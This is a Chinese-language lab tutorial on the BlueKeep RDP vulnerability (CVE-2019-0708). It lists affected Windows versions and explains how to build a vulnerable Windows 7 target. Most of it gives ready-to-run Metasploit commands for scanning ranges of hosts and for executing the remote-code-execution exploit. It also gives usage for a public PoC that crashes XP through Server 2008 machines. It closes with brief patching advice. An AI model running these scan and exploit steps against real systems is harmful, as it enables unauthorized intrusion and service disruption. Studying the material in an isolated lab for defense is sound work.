漏洞描述
当未经身份验证的攻击者使用RDP连接到目标系统并发送经特殊设计的请求(也称为“远程桌面服务远程执行代码漏洞”)时,远程桌面服务中存在一个远程执行代码漏洞(以前称为终端服务)。
影响版本
- Windows XP SP3 x86
- Windows XP专业x64版SP2
- Windows XP Embedded SP3 x86
- Windows Server 2003 SP2 x86
- Windows Server 2003 x64版本SP2
- Windows Server 2003 R2 SP2
- Windows Server 2003 R2 x64版SP2
- Windows Vista SP2
- Windows Vista x64版本SP2
- Windows 7
漏洞环境搭建
迅雷下载:
ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/
创建虚拟机时记得选择专业版安装,默认家庭版(家庭版无远程连接)
开启远程连接
漏洞检测
kali工具
启动msf
msfconsole
搜索漏洞检测exp
search 2019_0708
加载模块,设置需要检测的ip
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set rhosts 192.168.234.129
run
提示The target is vulnerable
表示漏洞存在
多ip检测只需要设置ip格式成以下规则
set rhosts 192.168.234.128-133
windows 下检测工具
工具下载地址:https://github.com/k8gege/CVE-2019-0708
工具使用方法:
#批量扫描
rdpscan.exe 192.168.234.1-192.168.234.254
#单个扫描
rdpscan.exe 192.168.234.129
如果出现VULNERABLE - CVE-2019-0708
说明存在漏洞
漏洞利用
漏洞限制较大,目前找到的rec脚本只针对 windows 7 系统
远程代码执行
攻击机:kali
目标机:windows 7
#启动msf
msfconsole
# 搜索2019-0708漏洞模块
search 2019-0708
#选择利用模块
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
#设置ip并进行工具
set rhosts 192.168.234.132
#修改目标系统类型(视情况而定)
set target 1
#执行攻击
run
如果set target 1
不行,我们需要尝试其他系统的exp脚本,show targets
可以查看针对与相对应系统的exp脚本
蓝屏
利用工具:
https://github.com/CVE-2019-0708/CVE-2019-0708
使用方法:
#python PoC.py ip
python PoC.py 192.168.234.129
可利用 WinXP | XP Embedded | Win7 | Server 2003 | Server 2008系统蓝屏
漏洞加固
- 安装一款360、火绒等类安全软件。
- 安装微软官方补丁 :https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708